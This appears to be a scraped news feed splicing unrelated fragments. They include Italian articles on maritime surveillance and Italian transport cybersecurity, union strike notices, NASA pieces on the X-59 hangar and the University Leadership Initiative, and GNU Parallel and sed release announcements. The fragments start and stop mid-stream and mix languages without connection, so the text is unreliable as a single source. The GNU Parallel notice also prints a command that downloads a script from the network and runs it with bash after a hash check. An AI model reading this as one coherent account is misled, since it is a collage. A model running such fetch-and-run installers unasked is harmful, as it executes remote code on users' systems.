E soprattutto significa che il mare, da spazio opaco per definizione, diventa progressivamente più “trasparente”. Non nel senso di completamente visibile – obiettivo probabilmente impossibile da raggiungere – ma nel senso di sempre più leggibile per chi dispone di strumenti adeguati.
In questo senso, il parallelo più evidente per ciò che sta accadendo sotto il pelo dell’acqua non è con la geografia o la cartografia tradizionali, ma con altri domini in cui l’informazione è la vera posta in gioco: il cyberspazio, lo spazio orbitale, persino il campo elettromagnetico. Anche lì, la competizione si gioca non solo sulla capacità di identificare gli oggetti fisici, ma su quella di costruire rappresentazioni affidabili e aggiornate dell’ambiente in cui si trovano immersi. Perché in un ambiente dove tutto è difficile da vedere, quello che più conta è capire cosa si sta guardando.
L'articolo Cina, Stati Uniti e la sfida degli abissi proviene da Guerre di Rete.
In occasione dell’anniversario della Giorno della memoria dedicato alle vittime del terrorismo presentiamo un libro che ricostruisce, per la prima volta in modo sistematico, la storia delle Commissioni d’inchiesta istituite tra il 1973 e il 1975 dalle regione per far luce sul fenomeno neofascista e sulla violenza politica degli anni della strategia della tensione. Un’iniziativa senza precedenti nella storia della Repubblica in quanto si trattava di un laboratorio democratico in cui istituzioni, sindacati, università e società civile si unirono per censire e contrastare l’eversione nera, proprio nel momento in cui il paese era attraversato dalle stragi – da piazza Fontana a piazza della Loggia – e da una conflittualità diffusa e lacerante.
Attraverso fonti archivistiche inedite, l’autore ricostruisce il ruolo cruciale che le Regioni – istituzioni nate solo nel 1970 – seppero svolgere nel rafforzamento della democrazia repubblicana, trasformando le commemorazioni per il trentennale della Liberazione in un atto politico di antifascismo militante e propositivo.
Introduzione di Catia Sonetti (Direttrice ISTORECO). Dialogheranno con l’autore Federico Creatini (Università della Calabria) e Giovanni Brunetti (ISTORECO).
4 min read
There’s no sign reading “home sweet home” in the hangar where the X‑59 now sits, but the sentiment is unmistakable among those tending to the quiet supersonic aircraft.
Located at NASA’s Armstrong Flight Research Center in Edwards, California, the X-59 hangar was built in 1968 but looks like new thanks to a full renovation and modernization. While the X-59 was being assembled in Palmdale, California, workers at NASA Armstrong gutted the hangar, adding new electrical wiring, a fire suppression system, office space, air conditioning, and other safety features.
“The whole team is incredibly proud of what we’ve accomplished in preparing this new home for the X-59,” said Bryan Watters, the NASA project manager at Armstrong who led the renovation effort. “The fact we could take a 1960s hangar and modernize it for use by a 2020’s X-plane is very special.”
The X-59 is the centerpiece of NASA’s Quesst mission to enable a new era of commercial supersonic air travel over land by reducing the sound of typically loud sonic booms to a much quieter sonic thump.
When NASA test pilot Nils Larson successfully took the X-59 into the air for the first time on Oct. 28, 2025, he flew from the Lockheed Martin Skunk Works assembly site in Palmdale to nearby NASA Armstrong, from where test flights have continued to make progress.
From the beginning of the program, knowing the X-59 would eventually need a new residence at NASA Armstrong, Quesst managers were on the hunt for somewhere to house the quiet supersonic demonstrator.
Like anyone looking for the ideal place to call home, the team made sure there would be enough space for the airplane and all its support equipment. But with the experimental jet measuring at just under 100 feet long and 30 feet wide, there were few options.
“We had to find a hangar that was long enough so that part of the X-59 wouldn’t hang outside, exposed to the elements,” Watters said.
Building 4826, as the hangar is officially designated, turned out to be the choice spot. “It was basically stripped down and gutted so that essentially it was just structural steel with siding. From that state it was rebuilt,” Watters said.
The feature they are perhaps most proud of is the hangar’s new floor. Covering more than 32,000 square feet, it is coated with epoxy that prevents any spills from seeping into the concrete.
From the hangar’s office windows, the view of the hangar floor can include the F-15 research jets that will be used as chase planes to support X-59 flights in the coming months. The renovation faced challenges along the way, chief among them being supply chain issues stemming from the COVID-19 pandemic. But there were some incredible, unforgettable moments too.
past and present
With X-59 now flying regularly and comfortably settled into its new digs, the Quesst team is gauging its performance on the way to quiet supersonic flight.
“This is truly a great time for Quesst and the X-59,” said Cathy Bahm, NASA’s project manager for the Low Boom Flight Demonstrator. “It’s also still a little surreal to be able to just walk down from your office and see the airplane in our hangar.”
For more than a year, the hangar refurbishment team worked through every detail of the X-59’s new home to make sure it would be safe and sound. But actually seeing the aircraft occupy that space is an adjustment for them, too.
“We’ve looked at X-59 models on our desk for years and then, you know, there’s the real thing right in front of us, in a hangar that we renovated,” Watters said.
A real thing in the hangar – and streaking across the California desert sky. The X-59’s transition from an idea into a working aircraft is a testament to the teams that help build out every aspect of its infrastructure.
NASA’s X-59 is supported under the agency’s Aeronautics Research Mission Directorate.
Jim Banke is a veteran aviation and aerospace communicator with more than 40 years of experience as a writer, producer, consultant, and project manager based at Cape Canaveral, Florida. He is part of NASA Aeronautics' Strategic Communications Team and is Managing Editor for the Aeronautics topic on nasa.gov. In 2007 he was recognized with a Distinguished Public Service Medal, NASA's highest honor for a non-government employee.
Giovedì 23 aprile, intorno alle 10 di mattina, un operaio , precario, della Ditta Bertini, appalto Piaggio, ha subito un grave infortunio.
Come rappresentanti dei lavoratori siamo stati informati dell’accaduto dalla Piaggio soltanto alle 16, dopo che la notizia era già uscita sulla stampa.
Un fatto GRAVE, che non ha messo nelle condizioni i RLS di fare verifiche tempestive.
Di fatto un tentativo da parte delle aziende coinvolte di nascondere un infortunio avvenuto in stabilimento, come accade nelle campagne dei caporali
Un incidente preannunciato , più volte avevamo chiesto con verbali e denunce di intervenire in quel reparto senza ricevere risposte. I sistemi di appalto e subappalto decisi dai dirigenti Piaggio, non servono per aumentare la sicurezza , ma i guadagni e lo sfruttamento dei lavoratori.
Per queste ragioni e per rivendicare il diritto a lavorare in sicurezza in Piaggio, come nelle altre ditte in appalto, Bertini e Ceva, si proclama per martedì 28 aprile 1 ora di sciopero a fine turno.
RSU SIAL COBAS e USB PIAGGIO
RSU CEVA
RSA BERTINI
L'articolo La transizione digitale delle PMI nel 2026: tra nuove minacce cyber e necessità di infrastrutture agili proviene da FullPress.
8 min read
For 10 years, a NASA initiative has helped the agency produce breakthrough aeronautical innovations while fostering the aviation workforce of tomorrow – and the University Leadership Initiative (ULI) is still flying high, making awards with the potential to change 21st century air travel.
Through ULI, NASA has supported more than 1,100 students at 100 schools, allowing them to pursue advancements in top priority areas for U.S. aviation, including high-speed flight, advanced air mobility, future airspace management and safety, and electrified propulsion.
Many of those students have used their ULI experience as a springboard to careers in aviation. And many of their ideas — such as designing more efficient wings or building supersonic aircraft that can change shape in flight — are either being investigated further by industry or the technologies adopted outright.
As it celebrates a decade of success, NASA’s ULI team is looking forward to leveraging student innovations with new awards in 2026 and beyond.
“Through ULI we’re building the workforce of the future and fostering the skill sets we so desperately need to compete globally,” said John Cavolowsky, director of NASA’s Transformative Aeronautics Concepts Program at NASA Headquarters in Washington.
john cavolowsky
Director, Transformative Aeronautics Concepts Program
What makes ULI unique from other NASA research projects, and especially appealing to universities, is that it provides the opportunity for university students and faculty to propose what research to conduct.
Usually, NASA determines the research it needs and then does the work itself or through partnerships and contracts. But with ULI, the agency shares its goals and universities consider how they can best help realize them.
“There are no better ways in my mind to help develop that talent within the students than to engage them in identifying big problems and then give them the resources they need to use their creativity to solve them,” Cavolowsky said.
NASA’s relationship with academia and reliance on its research proficiency is written into NASA’s DNA going back to the days of the National Advisory Committee for Aeronautics, from which NASA was formed in 1958.
“For more than a century we have leaned on the brilliance and the capabilities of universities to help us think,” Cavolowsky said. “With ULI we can ensure they continue to bring their fresh ideas and young energy to the work we do at NASA Aeronautics.”
ULI evolved from an earlier project called Leading Edge Aeronautics Research for NASA (LEARN). NASA selected five LEARN teams in 2015 to pursue truly outside of the box ideas that showed promise but needed additional study.
One of those teams, for example, sought to take a cue from migrating flocks of birds by asking if airliners could save fuel by cruising in a giant ‘V’ formation. The numbers were intriguing and simple flight tests proved the concept, although the idea never made it to practice.
Slightly retooled but keeping the innovative spirit of LEARN, ULI was officially announced in 2016 and a year later NASA selected five teams of university professors and students to contribute solutions to the biggest aeronautical challenges of the 21st century.
A decade later, NASA has made a total of $220 million in awards to 33 teams over eight rounds of solicitations
One of the earliest selected ULI teams was led by James Coder, who at the time was an aerospace engineering professor at the University of Tennessee in Knoxville. His team worked on technology that would smooth the airflow around a wing to make it more efficient.
Technically known as slotted natural laminar flow (SNLF) wings, Coder has called the idea a potential game changer for commercial airliners. The more efficient wing would mean less drag on an airplane, which in turn could help airlines save money on fuel.
Coder credits ULI for not only helping to prove the technology’s effectiveness – with the aid of wind tunnel testing at NASA’s Ames Research Center in California – but for providing students with an experience they couldn’t get elsewhere.
“After 10 years industry remains interested in the SNLF technology and I am optimistic for good reason about its future,” Coder said. “And project alumni have gone on to do many wonderful things and leverage what they did and learned through the ULI.”
With ULI experience prominent on their resumes, several of the students on Coder’s team wound up with jobs in industry – such as Boeing and Lockheed Martin – and government labs. One is currently a NASA Pathways intern working on his PhD.
Now at Pennsylvania State University, Coder remains a strong advocate for ULI.
“It goes above and beyond simple workforce development,” he said. “We recognized early on the value-add of ULI is the students themselves. While we could have just trained students en masse, we wanted to put them in the front seat of technical leadership on the project. I think this was a very successful strategy that benefited the project and the students as they embarked on their careers.”
Forrest Carpenter is another example of a student whose ULI support led to work after graduation – in this case at NASA.
“Working on the ULI project was an incredible experience, one I will always be thankful for and will remember fondly,” Carpenter said. “I think the project challenged me to be something more than ‘just an engineer;’ really helping my professional development and giving me a clearer focus on my passion.”
As a student at Texas A&M, he was part of a team selected by NASA in 2017 to research a novel idea in which a supersonic aircraft could alter its shape to fly more efficiently based on the atmospheric conditions in real time. Dimitris Lagoudas, now the university’s interim department head for aerospace engineering, led the team.
A laser shooting out ahead of the aircraft would take measurements of the oncoming air and then the aircraft’s computer would command patches of shape memory alloys and other mechanisms to morph the aircraft’s outer shape.
One possible application of the technology could be in contributing to the reduction of the loudness of a sonic boom, expanding on the science behind NASA’s X-59 quiet supersonic technology demonstrator that seeks to reduce the sonic boom to a sonic thump.
“My main research role on the team was performing Computational Fluid Dynamics simulations of the various geometries we were looking at, including a pre-production version of X-59,” Carpenter said.
His work on the idea continues. A follow-on NASA project, GoSWIFT, will flight test the core technologies Carpenter and his ULI team worked on at Texas A&M. Only this time, Carpenter is the co-lead for the tests, which are targeted to take place at NASA’s Armstrong Flight Research Center in California in the near future.
Carpenter’s enthusiasm for his work and gratitude for how ULI led to his career with NASA resonates with many other ULI alumni.
“The number of students impacted, and how they were impacted, by a long-term project like ULI is huge,” Carpenter said. “NASA’s involvement in this kind of activity can only strengthen the research done in this country and to help inspire and develop the next generation of our workforce.”
ULI is supported by the Transformative Aeronautics Concepts Program within NASA’s Aeronautics Research Mission Directorate, which publishes ULI solicitations and other opportunities to collaborate with the agency’s aeronautical innovators.
Jim Banke is a veteran aviation and aerospace communicator with more than 40 years of experience as a writer, producer, consultant, and project manager based at Cape Canaveral, Florida. He is part of NASA Aeronautics' Strategic Communications Team and is Managing Editor for the Aeronautics topic on nasa.gov. In 2007 he was recognized with a Distinguished Public Service Medal, NASA's highest honor for a non-government employee.
Nessuna notizia, nonostante i numerosi solleciti, per quanto riguarda il servizio di lavaggio esternalizzato alle cooperative. Indiscrezioni circa nuove esternalizzazioni riguardanti lo spazzamento estivo e i servizi del centro di raccolta in Capraia. Sempre cooperative, sempre contratti “pirata” multiservizi da pochi euro l’ora.
Le esternalizzazioni vanno avanti di pari passo con la totale assenza di un confronto sindacale in azienda. Con Pec di richieste di incontro inviate e nessuna risposta. Vanno avanti di pari passo con l’utilizzo di SUV e macchine di lusso da parte della dirigenza REA. Uno un vero e proprio schiaffi ai lavoratori che aspettano, da mesi, di riaprire un confronto serio sull’accordo di secondo livello.
Per l’Unione Sindacale di Base, che esprime in azienda due RSU e un RLS, non è più possibile andare avanti con queste modalità. Siamo pronti ad aprire lo stato di agitazione sindacale e andare a sciopero nei tempi previsti. Le esternalizzazioni selvagge devono essere fermate. I lavoratori delle cooperative devono essere internalizzati e pagati con il giusto contratto e la giusta retribuzione. Inutile, approvare mozioni sul salario minimo se poi nelle aziende pubbliche si applicano contratti da pochi euro l’ora. Bisogna ristabilire corrette relazioni industriali con incontri periodici e ufficiali tra dirigenza e RSU.
Abbiamo inviato una richiesta urgente anche all’amministrazione comunale di Rosignano e ci auguriamo che almeno l’ente pubblico abbia voglia e interesse di ascoltare le ragioni dei lavoratori.
Usb Igiene Ambientale Provincia di Livorno
IL NOVECENTO DI LIVORNO TRA STRADE E CANALI
L'articolo Gestire più siti WordPress: perché serve una piattaforma affidabile e centralizzata proviene da FullPress.
GNU Parallel 20260422 ('Artemis II') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
It is a fantastic tool for decades!
-- Ops_Mechanic@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.
GARR apre due nuove opportunità di lavoro a Roma per rafforzare i suoi team tecnici: sono aperte le selezioni per NOC Specialist e per DevOps e IT Automation Engineer, entrambe con contratto a tempo indeterminato.
Immagine in evidenza rielaborata con IA
Quanto è difficile parlare di cybersicurezza con le aziende. E ciò vale anche per quelle dei trasporti: un settore in apparenza lontano dagli attacchi dei cracker, ma che mostra invece parecchie vulnerabilità oltre a un ampio potenziale di rischio. Provare ad affrontare il tema della sicurezza informatica con alcune delle più grandi realtà del paese produce come minimo un irrigidimento; nel peggiore dei casi, il silenzio. Mail senza risposta, telefoni che squillano a vuoto, repliche vaghe: quasi nessuno si presta a rispondere alle domande del cronista, e molti si eclissano dopo un primo contatto di prammatica.
Prendiamo Autostrade per l’Italia (ASPI), la stessa società che qualche anno fa (non molti: era il 2018) finì sotto la lente di ingrandimento per il caso del ponte Morandi, crollato a Genova a metà agosto. Un disastro che aveva sollevato interrogativi profondi sui sistemi di controllo e sulla cultura della sicurezza del gruppo. Ci si aspetterebbe che queste procedure, fisiche e cyber, siano diventate il fiore all’occhiello del gruppo. E che – stando così le cose – non sia un problema comunicarlo all’esterno. Sbagliato. Svariati tentativi di contatto via email sono caduti nel vuoto. Non va meglio al telefono, con l’apparecchio dell’ufficio stampa che squilla senza che nessuno risponda. Quando si attiva la segreteria, lo fa solo per rimandare al medesimo indirizzo di posta elettronica, che rimane muto.
La società Movyon si definisce il “centro di eccellenza per la ricerca e innovazione del gruppo ASPI” e offre “soluzioni tecnologiche end-to-end per gestori di infrastrutture stradali e autostradali, pubbliche amministrazioni e service provider, supportandoli nella creazione di una mobilità più intelligente, accessibile, sostenibile e sicura a favore della comunità”. Il logo si trova, per esempio, sulle sbarre che si alzano e si abbassano ai caselli.
Sembra la porta giusta a cui bussare per parlare di cybersicurezza con ASPI. Del resto, la stessa Movyon sviluppa applicazioni tecnologicamente avanzate come quelle per il monitoraggio delle merci pericolose in viaggio sulla rete, il cosiddetto V2X (vehicle to everything): un sistema che, si legge nella presentazione, “monitora in tempo reale i veicoli che trasportano materiali pericolosi e avvisa i conducenti di eventuali situazioni di pericolo, come la presenza di altri veicoli con merci pericolose nelle vicinanze o situazioni anomale lungo la strada”. Il sistema non si limita al minimo indispensabile, ma, viene spiegato, arricchisce i messaggi con informazioni aggiuntive rispetto agli standard di settore. Lecito chiedersi: cosa succederebbe se venisse attaccato?
Estendendo il discorso, ci sono altre domande da porsi. Cosa accadrebbe se qualcuno tentasse di azzerare tutti i pedaggi, rubare i dati delle carte di credito degli automobilisti, o cambiare i messaggi nei cartelli a led che puntellano la rete, magari consigliando di effettuare deviazioni non necessarie al solo scopo di creare il caos? È già accaduto in passato? Quali misure sono state prese? Chi è il responsabile della sicurezza? Domande la cui risposta possiamo soltanto immaginare, perché neanche Movyon ha risposto alla nostra richiesta di contatto.
Anche il trasporto ferroviario non è esente da rischi cyber. Che possono riguardare gli apparati di gestione elettronica della rete e dei convogli, ma anche il sistema dei pagamenti. Nel mese di novembre 2025 un attore malevolo ha rubato e diffuso online 2,3 terabyte di dati di Almaviva (un provider di servizi web) e Ferrovie dello Stato, che a esso si appoggiava.
L’attacco è stato confermato dalla stessa Almaviva in una nota, dopo essere trapelato alla stampa. Secondo la rivendicazione dei cracker, il leak conterrebbe repository aziendali condivisi e documentazione tecnica riservata, inclusi contratti. Ma ci sarebbero anche dati personali dei passeggeri e dei dipendenti di quasi tutte le società del gruppo FS, da Mercitalia a Rete Ferroviaria Italiana, da Trenitalia a Italferr (da poco ribattezzata FS Engineering).
“L’episodio che ci riguarda è riconducibile a un accesso non autorizzato che ha interessato un vecchio data center in dismissione della società Almaviva”, rispondono le Ferrovie dello Stato a una richiesta di informazioni da parte di Guerre di Rete. “L’attenzione è concentrata sull’accertamento tecnico dei fatti, sulla tutela delle informazioni e sulla piena collaborazione con Almaviva, società obiettivo dell’attacco, e le autorità competenti”. Le FS non forniscono ulteriori dettagli “per rispetto delle indagini”, ma aggiungono che sono in corso “attività di verifica tecnica e monitoraggio di tutti i nostri sistemi”. Almaviva, viene spiegato dalle Ferrovie, ha “informato anche gli organismi competenti per la protezione dei dati personali, mentre il Gruppo FS collabora per ciò che riguarda tutti i profili di propria competenza”.
Che provvedimenti sono stati presi? “Appena emersa la vicenda, il Gruppo FS, grazie alla sinergia tra FS Security e FS Technology e in coordinamento con Almaviva e con le autorità, ha attivato tutte le misure di sicurezza e mitigazione necessarie”, risponde la società. “Sono stati predisposti backup alternativi, rafforzate le attività di monitoraggio e continuità operativa e condivise le azioni da intraprendere con le strutture di Security del gruppo e con gli organismi di vigilanza competenti. Parallelamente, prosegue il monitoraggio del web e dei canali specializzati per intercettare tempestivamente eventuali pubblicazioni di materiali riconducibili all’attacco. Anche Almaviva ha dichiarato di aver isolato l’attacco, attivato il proprio team specializzato e garantito la continuità dei servizi critici”.
FS definisce “fondamentale” il presidio dell’intera filiera tecnologica – considerando che tutti i grandi gruppi si avvalgono di fornitori che possono essere “bucati” – e ammette che non è sufficiente monitorare i sistemi interni. “I fornitori e i partner tecnologici sono tenuti a rispettare requisiti stringenti sul piano della sicurezza informatica, della protezione dei dati, della continuità operativa e della gestione degli incidenti. Tali presidi sono definiti nell’ambito dei rapporti contrattuali, dei processi di qualifica e delle verifiche periodiche, con livelli di attenzione coerenti con la criticità dei servizi affidati”. L’errore è sempre possibile, ed è in queste lunghe catene di fornitura che provano a infilarsi i cattivi della rete.
Già, il problema delle filiere. Sempre più complesse, e, per questo, sempre più vulnerabili. Pensare a un attacco al sistema ferroviario può spaventare, ma immaginare che sia il sistema di controllo di un aeroplano a essere bucato scatena il terrore. Guerre di Rete ha provato a contattare Ita Airways, compagnia di bandiera (o forse non più: dipende dai punti di vista) italiana. Alla nostra richiesta di intervista, gli uffici hanno opposto un no-comment. Non è stato possibile, dunque, parlare con il CISO (chief internet security officer, cioè il capo della sicurezza informatica) né domandare che tipo di procedure di sicurezza, almeno a livello basilare, siano prese a tutela dei viaggiatori.
Ma perché questa paura di parlare, quando si tratta di cybersecurity? A rispondere è l’ENAC, l’Ente nazionale per l’aviazione civile, che fa capo al governo ed è l’autorità che fissa le regole del settore in Italia basandosi su normative europee (come la NIS2) e nazionali. “La sicurezza, in generale, sta alle spalle dei processi operativi: per questo è prassi comune che non se ne parli, e che le misure prese non vengano condivise”, riflette l’ingegnere Sebastiano Veccia, a capo della sicurezza dell’ENAC. Nella sua interpretazione, “non è ritrosia, ma una forma di cultura di sicurezza: si fa, ma non si dice”.
Resta il fatto che il pubblico ha domande sul rischio di volare, soprattutto in tempi di guerre asimmetriche che coinvolgono obiettivi non militari. Chiediamo se è possibile far cadere un aereo per mezzo di un attacco informatico. “Mi sento di escluderlo”, risponde Veccia. “Certo, un caso molto diverso come quello dell’11 settembre insegna che tutto è possibile, ma si tratta di una probabilità estremamente bassa”. È possibile invece inserirsi nei sistemi di comunicazione con i piloti? “I sistemi di comunicazione tra l’aeromobile e la torre di controllo sono avanti anni luce”, risponde il dirigente.
E se invece qualcuno riuscisse a infiltrarsi nelle ditte che producono gli aeroplani, e quindi anche il software che li governa, per inserire codice malevolo? In fondo gli incidenti del Boeing 737 Max paiono legati a sensori difettosi e software. “È il problema ben noto dei cosiddetti insider nell’industria. In Italia e in Europa, per le figure che entrano a contatto con aree e attività sensibili, viene richiesto alle forze di polizia un controllo dei precedenti penali del soggetto. Per ruoli di particolare criticità si richiede, in aggiunta, un background check rafforzato, che non si limita ai precedenti penali, ma guarda anche agli ambienti e alle compagnie che la persona frequenta”. Indagini di intelligence che servono a capire se il soggetto è radicalizzato, o vicino ad aree politiche pericolose. “La prevenzione si fa a monte, e lo stesso approccio degli aeroporti vale anche per i costruttori aeronautici e chi fa manutenzione degli aeromobili. Anche per chi è incaricato di caricare i dati sui pc di bordo c’è una procedura blindata”.
Veccia è consapevole che la sicurezza è un gioco tra guardie e ladri: l’inseguimento è costante. Si prova a isolare i dispositivi critici dal mondo esterno. “Le chiavette di manutenzione vengono controllate, sterilizzate e infine distrutte. Non solo: in aviazione le stesse attività di controllo si espletano in loco e non, come spesso accade oggi, da remoto. La programmazione degli interventi di sicurezza è importante, così come lo è preparare una matrice dei rischi: perché il 90% delle emergenze è dovuto a cattiva pianificazione. Faccio comunque notare che energia nucleare e aeronautica sono sempre stati i due settori più controllati”.
La visione di Veccia è confermata da una nostra fonte interna al settore. Che, al tavolo di un ristorante, racconta come “negli ultimi trent’anni non ci sono mai stati due incidenti aeronautici per lo stesso motivo, e questo perché ogni volta che ne accade uno lo si analizza nei dettagli e si corre ai ripari. Questo, in altri settori dove le procedure sono molto più lasse, viene preso per eccesso di pignoleria”. Un esempio è quello dei trasporti marittimi, con i porti che rappresentano la via di ingresso privilegiata per le merci che finiscono sugli scaffali, per il petrolio, ma anche per molto altro.
Sarebbe sbagliato sottovalutare l’importanza della cybersicurezza nei porti: quantità enormi di merci viaggiano via mare. Ma ci sono anche droga, armi, materiale illegale. E persone. Si comincia dai controlli all’ingresso per camion e autoveicoli. Entrare liberamente nell’area portuale significa avere una sorta di lasciapassare, utilissimo se si sa dove mettere le mani. Sistemi di controllo esistono, certo. Ma, come racconta la nostra fonte, le maglie sono larghe: “Quando si fanno le gare di appalto, per esempio per le telecamere da installare, solitamente si sceglie il prodotto che ha il prezzo più basso, che di norma è cinese. Queste telecamere possono avere delle backdoor, delle porte software nascoste che sono in grado di esfiltrare i dati e che cambiano a ogni aggiornamento. In sostanza, non controllando la tecnologia che usiamo potremmo offrire a un paese straniero la possibilità di fare intelligence sulle nostre informazioni”. Pechino è la principale indagata.
Ma c’è di più. L’andirivieni di un porto è basato su un sistema di riconoscimento delle targhe automobilistiche: camion di autotrasportatori noti trovano porte aperte e sbarre alzate ai varchi. I controlli sono a campione. Facile capire come, con un attacco mirato, sia facile far entrare anche chi non sarebbe autorizzato. Basta inserire una targa in più nel gestionale e il gioco è fatto. Le procedure manuali sarebbero più efficaci, ma sono troppo lente per i volumi di traffico dei grandi hub. Senza considerare che gli spazi sulle banchine sono affittati e gestiti tramite un software gestionale estremamente complesso, che sa esattamente chi e dove farà cosa con mesi di anticipo: anche in questo caso, un cybercriminale che riuscisse a entrare nel sistema potrebbe creare il caos operativo, paralizzando le attività. Guerre di Rete ha contattato il porto di Gioia Tauro, principale scalo merci italiano: nessuna risposta, neanche dopo svariati tentativi telefonici e via mail. Ha risposto, invece, l’autorità portuale di Genova.
“In merito alla richiesta pervenutaci, siamo nella necessità di non poter aderire all’iniziativa proposta”, afferma la replica pervenuta tramite posta elettronica. “La cybersecurity costituisce un ambito di particolare sensibilità per le infrastrutture critiche nazionali, categoria alla quale i sistemi portuali appartengono a pieno titolo. La normativa vigente in materia, unitamente alle linee guida emanate dall’Agenzia per la Cybersicurezza Nazionale (ACN), raccomanda la massima prudenza nella comunicazione pubblica relativa a sistemi, procedure e strategie di protezione informatica. La policy dell’Ente prevede pertanto di non rilasciare interviste su tali tematiche al di fuori dei canali istituzionali preposti”. Insomma, nulla da dichiarare.
Il breve viaggio intrapreso offre un quadro allarmante. E le contromisure non possono essere solo tecniche. Veccia, dirigente dell’ENAC, sottolinea quanto la cultura aziendale giochi un ruolo centrale: “La formazione del personale è importante. C’è ancora chi lascia le proprie password attaccate al PC con dei post-it. Per questo va ribadito: anche se fare corsi può sembrare noioso ai dipendenti, quest’attività si rivela utile quando ci si trova di fronte a un caso sospetto, e si torna con la mente alle lezioni in aula per sapere come reagire”.
Ci sono anche altre questioni, più difficili da affrontare. Come spiega la nostra fonte, “molte delle soluzioni di cybersecurity nel nostro paese vengono vendute dallo stesso gruppo di persone, poche decine di soggetti che si conoscono tra loro e che possono essere avvicinati senza grossi problemi da chi è dotato di argomenti convincenti, e di una certa disponibilità economica”. Accade di continuo, spiega. Ma questo è un tema per un altro giorno.
L'articolo Le troppe falle nella cybersicurezza dei trasporti italiani proviene da Guerre di Rete.
This is to announce sed-4.10, a stable release.
It's been more than 3.5 years and quite a few new bug fixes.
Special thanks to Paul Eggert, Bruno Haible and Collin Funk
for all their help, and especially to Bruno for all the gnulib
support and thorough and indefatigable testing and analysis.
There have been 92 commits by 9 people in the 180 weeks since 4.9.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Arkadiusz Drabczyk (2)
Ash Roberts (1)
Brun Haible (1)
Bruno Haible (5)
Collin Funk (5)
Hans Ginzel (1)
Jim Meyering (60)
Paul Eggert (16)
Weixie Cui (1)
Jim
[on behalf of the sed maintainers]
==================================================================
Here is the GNU sed home page:
https://gnu.org/s/sed/
Here are the compressed sources:
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz (2.7MB)
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz (1.7MB)
Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz.sig
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
SHA256 (sed-4.10.tar.gz) = TRef+vkuxNzsVB98Ayvhw7mhhW9JcK25WlBSIXAvUnc=
SHA3-256 (sed-4.10.tar.gz) = ftB7Hf2uN4RnayBEgasV7KmqZqCxBUj7e+Am6WDaiKk=
SHA256 (sed-4.10.tar.xz) = uOchgrLslqNXTimYxHt6qmTMIM4ADY6awxPMB87PKMc=
SHA3-256 (sed-4.10.tar.xz) = bVWJvXR28fvhgP1XTpej6t8V+Bh2YI1lL6aGBy1cG5c=
Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.
Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify sed-4.10.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096/0x7FD9FCCB000BEEEE 2010-06-14 [SCEA]
Key fingerprint = 155D 3FC5 00C8 3448 6D1E EA67 7FD9 FCCB 000B EEEE
uid [ unknown] Jim Meyering <jim@meyering.net>
uid [ unknown] Jim Meyering <meyering@fb.com>
uid [ unknown] Jim Meyering <meyering@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key jim@meyering.net
gpg --recv-keys 7FD9FCCB000BEEEE
